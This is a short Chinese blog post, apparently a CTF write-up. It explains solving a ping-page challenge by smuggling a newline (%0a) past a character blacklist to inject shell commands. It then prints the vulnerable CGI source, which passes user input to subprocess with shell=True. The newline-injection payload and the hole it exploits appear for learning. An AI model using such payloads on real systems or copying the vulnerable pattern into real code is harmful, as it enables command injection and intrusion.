帮小伙伴解个题,想起博客很久没更新了,顺便写上来。
给了个网址,提示说按照正常思维去拿flag.......(瞬间吐槽2333333玩这个谁会自己按照正常思维啊...)
给出网页可以允许ping其他主机并显示结果。
这个阶段的话就相当于随便猜了,八九不离十是远程代码执行。然后开始常见注入测试,但是发现大部分都被过滤了。
还好换行符没被ban,unix中还能用作分隔符。
果然可以列出当前目录....然后就开始吐槽制作方的无脑.....(等下你就知道了)
然后发现这个页面同时支持GET/POST请求,写了个注入语句读取一下这个cgi的内容:
?dest=%0acat Python
#!/usr/bin/env python import cgi, subprocess, os headers = ["mod_cassette_is_back/0.1","format-me-i-im-famous","dirbuster.will.not.help.you","solve_me_already"] print "X-Powered-By: %s" % headers[os.getpid()%4]print "Content-type: text/html"print print """<html> <head><title>Can I haz Smart Cat ???</title></head> <body><h3> Smart Cat debugging interface</h3>""" blacklist = " $;&|({`\t"results = ""form = cgi.FieldStorage()dest = form.getvalue("dest", "127.0.0.1")for badchar in blacklist:if badchar in dest:results = "Bad character %s in dest" % badcharbreak if "%n" in dest:results = "Segmentation fault" if not results:try:results = subprocess.check_output("ping -c 1 "+dest, shell=True)except:results = "Error running " + "ping -c 1 "+dest print """ <form method="post" action="index.cgi">Ping destination: <input type="text" name="dest"/></form> Ping results:<pre class="brush:php;toolbar:false">%s